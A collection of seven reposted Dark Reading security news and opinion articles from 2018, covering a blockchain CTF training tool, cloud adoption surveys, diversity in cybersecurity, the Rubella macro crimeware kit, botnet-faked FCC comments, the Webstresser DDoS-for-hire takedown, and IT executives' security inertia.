STE WILLIAMS

Blockchain is understood to be an inherently secure technology, but that doesn’t mean every implementation of blockchain is secure. A new tool, Blockchain CTF, can help train software developers, security professionals, and blockchain experts to design and implement more secure blockchain applications.

Blockchain CTF (which stands for “capture the flag”) is a simulator developed by Security Innovation, a company that provides security training, assessment, and consulting. Blockchain CTF is being released as a free resource for members of the security and blockchain communities.

With Blockchain CTF, participants see a series of vulnerable smart contracts and decentralized apps (DApps) in situations that range from initial coin offerings to open source lotteries. Participants are challenged to find and exploit the vulnerabilities and, in doing so, win points for placement on a leaderboard.

Within the simulations, Security Innovation provides tips and hints aimed at helping participants gain knowledge in developing and testing smart contracts and DApps. The platform is implemented as a client-side DApp on the Ethereum Testnet Blockchain, with states managed by the Ropsten Testnet Blockchain.

For more, see Blockchain CTF here.

Join Dark Reading LIVE for an intensive Security Pro Summit at Interop IT X and learn from the industry’s most knowledgeable IT security experts. Check out the agenda here.Register with Promo Code DR200 and save $200.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/cloud/free-new-tool-for-building-blockchain-skills/d/d-id/1331650?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Everyone understands the benefits of the cloud, and the recent iboss 2018 Enterprise Cloud Trends Report shows adoption is increasing, with IT decision makers (ITDMS) planning to increase their SaaS spend from 21% of the overall IT budget to 28% over the next year. Despite this vote of confidence in the cloud from IT, the findings indicate that there is still a fundamental misunderstanding about the cloud that’s creating a disconnect – and misplaced concerns – among office workers and ITDMs.

While virtually all the ITDMs surveyed (99%) say that there is at least one positive driver motivating them to explore more cloud-based solutions, they still by-and-large acknowledge that their organization’s security policies need to improve to operate fully in a cloud environment (91%). This reservation hasn’t slowed down the use of SaaS and cloud products across the enterprise; every office worker polled views cloud and SaaS favorably, often bringing these applications into the network workflow with or without the approval of IT.

In fact, the survey shows that Shadow IT is rampant at most organizations, especially those that rely upon cloud-delivered tools and services to enable remote work. As many as 82% of the office worker respondent group admits to accessing SaaS applications when working remotely without using their company’s VPN, in violation of an acknowledged remote work policy. Those who have circumvented their company’s VPN do so to usurp restrictions enforced by IT, or because the security functions of the VPN cause latency issues that inhibit work.

Almost three quarters (72%) of surveyed office workers agree that it is more important for them to get access to the cloud and SaaS applications they need to do their job effectively than to tell the IT department what applications they are using. This is creating an environment where the security teams that are tasked with protecting network resources could be blind to glaring vulnerabilities because of inappropriate worker activity.

The challenges to overcoming this disconnect begins with every stakeholder – from office workers to ITDMs – gaining a more complete understanding of what the cloud means and how SaaS tools are delivered. Many of the top concerns that ITDMs hold about cloud – despite their inability to throttle the rate of SaaS adoption to meet business goals – are misguided, as these teams are only considering old-school cloud architectures that feature built-in security flaws.

The truth is, there are a multitude of ways that cloud-based services can be delivered to businesses without putting the organization at greater risk for data theft.

For starters, companies should investigate cloud tools that leverage “dedicated” cloud environments, as opposed to the multi-tenant, shared-cloud settings that pool customer data and cloud capacity among users. This will alleviate fears regarding data privacy (top concern for 62% of ITDMs) by ensuring that content is never mixed in that cloud setting so long as office workers continue to use approved, single-tenant cloud products.

There also needs to be fewer workarounds for employees looking to usurp network security protocols such as  VPNs for remote work. By leveraging cloud-based security or web gateway products, for instance, teams can retire VPNs altogether and redirect remote traffic to gateways in-the-cloud rather than backhaul connections. This will simplify network security architectures, retire the need for backhaul networks, and limit the opportunities for remote workers to inadvertently compromise network security.

Paul Martini is the CEO, co-founder and chief architect of iboss, where he pioneered the award-winning iboss Distributed Gateway Platform, a web gateway as a service. Paul has been recognized for his leadership and innovation, receiving the Ernst Young Entrepreneur of The … View Full Bio

Article source: https://www.darkreading.com/partner-perspectives/iboss/cloud-misconceptions-are-pervasive-across-enterprises/a/d-id/1331632?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Something shifted last week in the cybersecurity diversity gap conversation.

A rare representation of several speakers of color, gender, and various cultures took the stage in San Francisco both at the RSA Conference and related events. They shared not only their security and privacy expertise, insight, and research – but also their firsthand experiences as minorities and their recommendations for creating a more diverse and inclusive industry.

The glaring lack of diversity in the industry’s workforce is well-documented: women make up just 11% of the industry, while Hispanic and African-Americans overall comprise 12%. But the numbers have mostly remained static, despite an increasingly diverse US and global population. 

Backlash a few weeks ago over a relative lack of women represented in the RSA Conference’s initial slate of keynote speakers led renowned executives from Facebook, Google, and members of other tech firms to organize a rival one-day conference called Our Security Advocates (OURSA). The April 17 event featured talks by security and privacy experts from underrepresented backgrounds and sectors of society.

Just across the street, the day before, the RSA Conference held its own event called Securing Diversity, with a lineup of women and minority speakers in the industry discussing how to hack the security diversity gap. The RSA Conference keynote slate the following day featured a QA with US Department of Homeland Secretary Kirstjen Nielsen, in addition to several women speakers in the session tracks.

But it was the combination of mounting frustration over the industry’s seeming inability to recruit and retain a more diverse workforce and the OURSA conference’s protest that ultimately made diversity one of the key industry themes during the industry’s largest annual conference week.

“It’s more important than ever that security and privacy platforms are built to reflect the diversity of our users, employees, and administrators of the world,” Parisa Tabriz, Google’s director of engineering, told attendees at OURSA.

Minorities and women in the industry often find they are constantly battling for equal treatment. “We’ve got a ways to go here, for women and people who look like me. We have to work twice as hard to make ourselves credible and to be heard,” Devon Bryan, founder and president of the International Consortium of Minority Cybersecurity Professionals (ICMCP), said at an event sponsored by the Cybersecurity Diversity Foundation.

Bryan, who is also executive vice president and CISO of the Federal Reserve System, points out that minorities don’t want to be hired just because they are minorities. “They don’t want to be hired because of what they look like, they want to be hired because they are good at what they do. They want to be valued and contributing,” he said. “Diversity is not about the numbers.”

Diversity isn’t just about the cybersecurity talent gap, either, according to Kim Jones, director of the Cybersecurity Education Consortium at Arizona State University and a former CISO and intelligence professional. Jones, who spoke at RSA Conference’s Securing Diversity summit, argues that getting serious about fostering a more diverse industry requires looking at things differently.

“We need to separate diversity from the talent gap issue. Before there was a talent shortage, there was a diversity problem,” Jones said, noting that security itself doesn’t care about race, creed, color, or sexual orientation, so there shouldn’t be a diversity gap.

“For some reason, we are not attracting or resonating or giving an opportunity” for minorities to work in the industry, he said. Some of that is the image cybersecurity often projects, with black hoodies or “bad boy” attitudes that don’t resonate among underrepresented groups: “That’s not the way to recruit,” he said. “When I talk to students, I say if you want to be someone who helps defend people … and make a difference,” come work with me.”  

Minorities and women already in the industry also need to step up and serve as role models. “If you don’t have a role model, be one. I’ve been the sole African-American executive” of companies before, he said. “Being the ‘only one’ is hard, but equip the people behind you.”

It’s not just about hiring: it’s about the inclusion of those diverse employees, said Mischel Kwon, founder and CEO of MKACyber and creator of the Cybersecurity Diversity Foundation. That means ensuring minorities and women get their voices and input heard at work and in meetings; and it can take time to hack through implicit biases that prevent that. “You have to have the uncomfortable conversations,” Kwon told Dark Reading in an interview.

Corporate diversity initiatives also require a little soul-searching. “My question is how serious are you? Are you doing something just to make the numbers get better or [because] it feels good to say you’re talking about” diversity, Jones said. “Or are you truly and honestly making a difference not because the numbers say we need to, but because it’s the right thing to do.”

United on Diversity

Christine Izuakor, senior manager of global security strategy and awareness at United Airlines, said the airline has a diverse cybersecurity team made up of 40% women and various ethnicities and sexual orientation. “For that we are a much stronger team,” she said. “But it’s not about color or gender. It’s the unique perspective each brings.”

She said United’s diverse security team grew organically. “I don’t know if it was intentional” originally to build such a diverse team, she told Dark Reading in an interview. “There’s a more deliberate focus on that today.”

Among United’s initiatives to foster diversity are its cybersecurity rotation program, which includes providing internships to students in underrepresented communities. “We need to ignite that spark to [attract] people in all walks of life,” she said.

Recruiting a more diverse team also means busting a few myths that hold back the industry from attracting a wider range of people, including making technology solutions that are inclusive by design so that people from all backgrounds get access to the same opportunities in the field, and help remove any barriers to them. “I’m a first generation Nigerian in America, and my culture didn’t support” an IT security field, she said. “I was raised to believe that success is a doctor or an engineer, and nothing in between.”

Izuakor said the “spark” that drew her to cybersecurity wasn’t a role model – there weren’t any for her at the time – but an elective cybersecurity course she took in college.

She believes companies should scrap the minimum degree and experience requirements for new job candidates. “Being an expert is absolutely important, but it’s not years of experience alone that determine the value of contributions,” she said. “We need to focus more on creating opportunities for entry” level applicants, and provide them a career “line of sight,” she said.

The Year Up organization, for example, trains young urban adults for six months and then offers a six-month internship with participating organizations as a career path. “Fresh perspective works wonders,” she said. “It takes that cross-generational knowledge and sharing and collaboration.”

Coding and technical experience aren’t the only skills needed in cybersecurity jobs, according to Izuakor, noting that the image of a coding expert wearing a black hoodie presents an image problem. “Our industry needs an extreme makeover,” she said. “Our images are one of the greatest barriers to the industry, especially for minorities … We need to make sure we are positioning ourselves more inclusively.”

Meantime, several speakers in the diversity sessions acknowledged that they were mostly preaching to the choir. “People who need to hear this are not here. That’s the biggest problem,” Jones said. “You need to bring conversations like this to the main hall [of RSAC] and make people a little uncomfortable to hear about it.”

Related Content:

• 10 Women in Security You May Not Know But Should
• Best Practices for Recruiting Retaining Women in Security
• Mischel Kwon Unplugged

Join Dark Reading LIVE for two cybersecurity summits at Interop ITX. Learn from the industry’s most knowledgeable IT security experts. Check out the security track here. Register with Promo Code DR200 and save $200.

Kelly Jackson Higgins is Executive Editor at DarkReading.com. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise … View Full Bio

Article source: https://www.darkreading.com/vulnerabilities---threats/diversity-its-about-inclusion/d/d-id/1331637?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

When it comes to malware and cybercriminals, sometimes “cheap” and “fast” clearly trumps “tested” and “sophisticated.”

That’s the case with Rubella Macro Builder, a recently discovered crimeware kit that, despite being new and relatively unsophisticated, has been gaining popularity among cybercriminals – including members of the suspected Russian gang behind the Panda banking malware.

Security vendor Flashpoint, which issued an advisory on the threat this week, described Rubella as enabling criminals to generate Microsoft Word (.doc) and Microsoft Excel (.xls) payloads.  “The Rubella-generated malware acts as a first-stage loader for other subsequent malware downloads and installations on targeted machines,” says Vitali Kremez, director of research for Flashpoint.

Since it surfaced in February, Rubella Macro Builder has been used as a first-stage loader in one of the most recent Panda campaigns. The group behind the distribution appears to have targeted victims through various social media platforms and through webinjects, Flashpoint says.

“Flashpoint identified Rubella malware infection leading to the execution of the Panda banking malware version 2.6.6 and Gootkit banking malware,” Kremez says. Panda and Gootkit are designed to harvest credentials, infect browsers through webinjects and enable remote PC access via a hidden virtual network-computing module, he says.

When it first surfaced in February, the authors of the Rubella crimeware kit priced it at a relatively low $500 per month. Since then, prices for the kit have dropped even further to just around $150 for a three-month subscription even as it has acquired several new capabilities, according to FlashPoint.

The Rubella crimeware kit currently includes support for XOR and Base64 encryption algorithms, PowerShell, Microsoft.XMLHTTP, and Bitsadmin download methods and multiple payload execution options including Visual Basic Script and JavaScript.

Rubella Macro Builder does not exploit any security vulnerabilities. Rather, it relies on social engineering techniques to force victims to enable malicious macro execution to run it, Kremez says. It is typically distributed to intended victims via Microsoft Word or Excel email attachments during spam campaigns. It comes with some rudimentary but nevertheless effective obfuscation methods for bypassing basic AV tools.

“The macro builder has a clear appeal for cybercriminals: it’s cheap, fast, and can defeat basic static anti-virus detection,” Kremez says.

Rubella is somewhat similar to ThreadKit, a more advanced malware kit that researchers at Proofpoint discovered last October and described in an alert in March. ThreadKit, like Rubella is a Microsoft Office document exploit builder, but packs more features, including a mechanism for reporting infection statistics back to the operators of the malware.

ThreadKit has been used quite extensively to spread numerous malware payloads including Trickbot and remote access Trojans like Loki Bot and FormBook. One well-known crime group that has been using the kit is the Cobalt Gang, a threat actor associated with various ATM heists.

“Microsoft Office macro-based malware appears to still be threat actors’ preferred method for obtaining initial access to compromised machines,” Flashpoint said in its advisory. Microsoft Office-based loader malware like Rubella work well as an intial decoy because they look like commonly exchanged Word and Excel documents and attachments.

According to the security vendor, Rubella Macro Builder represents a moderate threat for enterpises given its ability to beat static AV tools and its low pricing model. To mitigate their exposure to the threat, organizations should pay attention to email messages with suspicious Word or Excel attachments, especially those that ask permission to ‘Enable Content’ for running macros, FlashPoint said.

Related Content:

• Microsoft Office Docs New Vessel for Loki Malware
• Fileless Malware: Not Just a Threat, but a Super-Threat
• 5 Email Security Tips to Combat Macro-Enabled Ransomware

Join Dark Reading LIVE for an intensive Security Pro Summit at Interop ITX and learn from the industry’s most knowledgeable IT security experts. Check out the agenda here.

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year … View Full Bio

Article source: https://www.darkreading.com/vulnerabilities---threats/low-cost-crimeware-kit-gaining-popularity-in-underground-markets/d/d-id/1331638?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

In December 2017, people looking through the Federal Communications Commission’s net neutrality comment form witnessed a miracle — the dead returning to life.

Or that’s how it looked, anyway. In reality, cybercriminals used a botnet to post what an analysis by the New York State Justice Department estimated to be over 2 million identical comments under the names and street addresses of real people. In a strange twist, frustrated users quickly took to Twitter to report that some of these names belonged to their deceased family members and friends.

Though this instance of fraud may seem like a one-off, I believe we’re only seeing the beginning of this kind of threat. We’re likely to see more and more efforts to obscure or influence public opinion like this in the near future, and it will become more difficult to separate the bots from real users.

A Threat to Us All
In this instance, cybercriminals are using a tactic called skewing — deploying huge botnets to flood a comments section — to, well, “skew” public opinion. The bot comments not only drowned out real users but could also have shifted the sentiment of the public conversation about net neutrality. Though the FCC says it didn’t pay much attention to the comments, the implications of the attack are more pressing than the attack itself. Identity fraud was used to influence a vote in Congress that would determine the fate of one of the most important Internet laws in our society — who knows what else these botnets could be used for?

It used to be that bots were easy to detect and stop because they behaved in ways that clearly broke the rules set by websites for users. In many cases, bots would try to inject code on the website they were invading, an action that is clearly not allowed and therefore subjects the account to banning or suspension by moderators.

The tricky thing about today’s bots is that, on paper, they follow all the rules. They can register a real email address to create an account, confirm a password, and even pass CAPTCHA tests to “prove” that they’re human users at a 70% success rate. At White Ops, we see that 75% of malicious bots are actually operating off of real humans’ machines. They hide in the background, mimic behaviors and browsing times, and use their hosts’ cookies and browsing history. That makes it an awful lot harder to identify bots, block them, and prevent them from tipping the scales of public opinion.

The only reason the fraudulent FCC comments were detected in the first place was because the botnet’s operators made the mistake of impersonating deceased human users. On the whole, the botnet appears to have been fairly rudimentary, not very likely the work of sophisticated cybercriminals. Otherwise, this threat may have gone completely undetected among the form letters and authentic traffic, which raises a frightening question: how many of these attacks have already happened right under our noses?

While the damage done by cybercrimes, such as breaking into and stealing from someone’s online bank account, can be disastrous, the implications of this kind of “zombie” network go far deeper. Cybercriminals most likely utilized similar botnets on both sides of the 2016 presidential election, and their effect on its results are ultimately impossible to quantify.

If left unchecked, these bots will steadily erode human users’ trust in anything they see on the Web. Given how easy it is to impersonate human behaviors, how popular will the most popular stories in your feed be, really? Does the song that’s topping the charts of your favorite streaming service or the latest viral video really have that many plays? Is the metric that’s guiding your company’s decisions based in anything real or the work of some unseen manipulator hiding in the shadows?

Make no mistake — the stakes here are high. In many ways, the Internet is ruled by algorithms and machine learning that curate what makes it to the top of the charts on a minute-by-minute basis. The ability to manipulate those rankings can have real value. It’s gaining that kind of visibility that fuels the multibillion dollar advertising industry that we know today.

In the near future, wars over public opinion could be determined by who has the most convincing bots, not the most convincing argument.

Stemming the Tide of Bot Traffic
The fraud campaign to take down net neutrality seems to be the work of amateurs, yet it still very well could have influenced a major congressional vote. Cybercriminals are installing malware on our computers and using them to do practically anything they want. We don’t necessarily know what else hackers have accomplished using our names and addresses.

There’s always a way to identify and stop new automated threats, no matter how large and untraceable they may seem. But it can’t happen until cybersecurity professionals everywhere recognize the potential severity of this problem, not just for specific entities on the Internet, but for our ability to trust anything that we find online.

Some commentators have said the end of net neutrality heralds the death of the Internet — but ironically enough, it may be the wake-up call that inspires us to save it.

Related Content:

• 7 Key Stats that Size Up the Cybercrime Deluge
• The Good, the Bad the Disruptive: Bots on the Wild, Wild Web
• Bad Bots Increasingly Hide Out in Cloud Data Centers

Join Dark Reading LIVE for two cybersecurity summits at Interop ITX. Learn from the industry’s most knowledgeable IT security experts. Check out the security track here. Register with Promo Code DR200 and save $200.

Prior to co-founding White Ops, Tamer Hassan was the founder and CEO of Compel Data Technologies Inc., a software development and consulting company focused on big data and business intelligence solutions. In the years prior to entering the technology sector, Tamer was a … View Full Bio

Article source: https://www.darkreading.com/vulnerabilities---threats/why-information-integrity-attacks-pose-new-security-challenges/a/d-id/1331562?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

The world’s largest online marketplace for selling and lauching distributed denial-of-service (DDoS) attacks was shut down this week as part of Operation Power Off, an international investigation into the so-called Webstresser.org site. The effort was led by the UK National Crime Agency (NCA) and Dutch National Police, with support from Europol and a dozen global law enforcement agencies, Europol reports.

Webstresser had more than 136,000 registered users, and threat actors have reportedly used it to launch at least four million cyberattacks, targeting government agencies, banks, police organizations, and victims in the gaming sector by flooding their servers with traffic, according to Europol.

The site simplified the process of launching DDoS attacks, once a threat mostly accessible to tech-savvy cybercriminals. Anybody, regardless of their technical skill level, could use Webstresser’s online payment system or cryptocurrency to rent out stressers or booters, which were available for as little as 15 EUR/month and could be used for destructive DDoS attacks.

Stressers and booters are for-hire services that grant access to DDoS botnets. Most aim to make money under the pretense of offering a legitimate, useful service to test servers’ resiliency. In reality, they usually don’t require proof of identity from the individual launching the attack, nor do they ask whether the attacker is associated with the organization being targeted.

“As this event illustrates, it remains ridiculously cheap to rent a devastating DDoS attack from these so-called DDoS ‘stressers’ or on the Dark Web,” says Andrew Lloyd, president of Corero Network Security. “In many territories, it also remains a criminal offence.”

Authorities in five countries, including Canada, Croatia, Serbia, and the Netherlands, along with support from Europol and Police Scotland, arrested six suspected members of the group behind Webstresser on April 24. Dutch Police, with support from Germany and the US, seized servers and started the takedown of the site on the morning of April 25.

Europol’s European Cybercrime Centre (EC3) and the Joint Cybercrime Action Taskforce (J-CAT) provided support for the investigation by enabling an information exchange among all participating organizations. On the day of the takedown, a command and coordination post was set up at Europol HQ. Europol reports measures were also taken against Webstresser’s top users in the Netherlands, Italy, Spain, Croatia, the UK, Australia, Canada, and Hong Kong.

NCA officials believe an attacker linked to an address in Bradford, UK, used Webstresser to target seven of the UK’s largest banks in November 2017. The banks were forced to scale back their operations and, in some cases, shut down entire systems, costing hundreds of thousands of pounds in recovery. The address was identified and searched as part of this effort.

John Fokker, McAfee’s head of cyber investigations, notes how Webstresser points to the overall rise of attacks on the gaming sector, which is increasingly targeted as attacks become easier to launch. He also suggests a threat like this could have geopolitical implications.

“Attacks on gaming servers predominately committed by young people are becoming increasingly popular and the relative ease with which these attacks are carried out by individuals with little hacking experience is striking,” he says. “Webstresser and other similar attacks suggest entire organizations or parts of a country can be disrupted for the price of a pound of good coffee beans.”

Jo Goodall, senior investigating officer at the NCA, urged businesses and individuals to report cybercrime. In a statement, she points to the Action Fraud website, the UK’s national fraud and cybercrime reporting center. Guidance on how to mitigate the effects of cyberattacks can be found at the National Cyber Security Centre website.

Related Content:

• Low-Cost Crimeware Kit Gaining Popularity in Underground Markets
• Coviello: Modern Security Threats are ‘Less About the Techniques’
• ‘Stresspaint’ Targets Facebook Credentials
• Threat Actors Turn to Blockchain Infrastructure to Host Hide Malicious Activity

Join Dark Reading LIVE for a two-day Cybersecurity Crash Course at Interop ITX. Learn from the industry’s most knowledgeable IT security experts. Check out the agenda here. Register with Promo Code DR200 and save $200.

Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance Technology, where she covered financial … View Full Bio

Article source: https://www.darkreading.com/vulnerabilities---threats/webstresser-ddos-attack-site-shut-down-in-international-operation/d/d-id/1331642?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

A wise person once said, “Insanity is doing the same thing over and over again and expecting different results.” However, in a recent survey done by CyberArk for its Global Advanced Threat Landscape Report 2018 (registration required), almost half (46%) of 1,300 IT executives in seven countries say they rarely change their security strategy — even after a cyberattack.

The survey findings suggest that atroubling degree of security inertia lurks within scores of organizations and effectively renders them unable to repel or contain cyber threats. Such complacency puts sensitive corporate data, IT infrastructure, and assets at risk. In fact, an overwhelming 46% of respondents say their organization can’t stop the bad guys from infiltrating internal networks each time they try. More than a third (36%) say that their company’s administrative credentials are stored on personal computers in Word or Excel documents. Further, half (50%) of the respondents admit that their customers’ privacy or personally identifiable information could be at risk because their data is not secured beyond the legal minimums.

Flexibility Overrides Security
Whether organizations use cloud computing, build large-scale data silos, or connect thousands of IoT devices, going digital inevitably means facing a whole range of new cyber threats — with safeguarding privileged accounts being the starting point, according to the study. Most IT security pros say that protecting an IT environment starts with safeguarding privileged accounts. Nine out of 10 (89%) of experts surveyed say IT infrastructure and critical data are not fully protected unless privileged accounts, credentials, and secrets are under digital lock and key. Regarding cybersecurity threats, respondents worry most about targeted phishing attacks (56%), insider threats (51%), ransomware or malware (48%), unsecured privileged accounts (42%), and unsecured data stored in the cloud (41%).

IT security respondents also say the proportion of users with local administrative privileges on their devices increased from 62% in 2016 to 87% in 2018 — a 25% jump. This seems to indicate that employee demands for flexibility are overriding best data-protection practices.

The automation that is part and parcel of the cloud and DevOps mean privileged accounts, credentials, and secrets are being created at breakneck speed. If breached, these provide attackers with an ideal platform from which they can gain access to sensitive data across networks, data and applications, or cloud infrastructure they can use for illicit cryptomining activities. More organizations are acknowledging this security risk but nevertheless adopt a lax approach to cloud security.

When it comes to the cloud, 49% of organizations surveyed have no privileged account security strategy. More than two-thirds (68%) shift the responsibility for cloud security to the vendor and the built-in security features of its cloud solution. Another 38% say their cloud provider doesn’t provide adequate protection.

Reforming Security Culture
Security is often misperceived as a cost factor or necessary evil rather than a differentiating factor or competitive advantage. Consequently, banishing cybersecurity inertia will involve making it key to organizational strategy and behavior. To that end, most respondents to the survey (86%) say security should be a routine board-level discussion item, which suggests that currently there is a potentially disastrous disconnect between cybersecurity and the C-suite.

Despite the survey’s bleak outlook, some organizations are evolving their security strategies to meet the current challenges. About 44% of them, worldwide, recognize or reward staffers who help ward off an IT security breach — and the number is even higher (74%) in the United States. Another 8% of companies perform red-team exercises to reveal weak spots in their IT and develop effective responses. But much more work needs to be done. Rather than viewing security simply as a cost, digital business champions will recognize it as a key aspect of every project and activity, use it to differentiate themselves from their less-secure competitors — and leave them in the dust.

Related Content:

• Who Does What in Cybersecurity at the C-Level
• The Disconnect Between Cybersecurity the C-Suite
• Mastering Security in the Zettabyte Era

Join Dark Reading LIVE for an intensive Security Pro Summit at Interop IT X and learn from the industry’s most knowledgeable IT security experts. Check out the agenda here. Register with Promo Code DR200 and save $200.

Marc Wilczek is a columnist and recognized thought leader, geared toward helping organizations drive their digital agenda and achieve higher levels of innovation and productivity through technology. Over the past 20 years, he has held various senior leadership roles across … View Full Bio

Article source: https://www.darkreading.com/vulnerabilities---threats/despite-risks-nearly-half-of-it-execs-dont-rethink-cybersecurity-after-an-attack/a/d-id/1331627?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple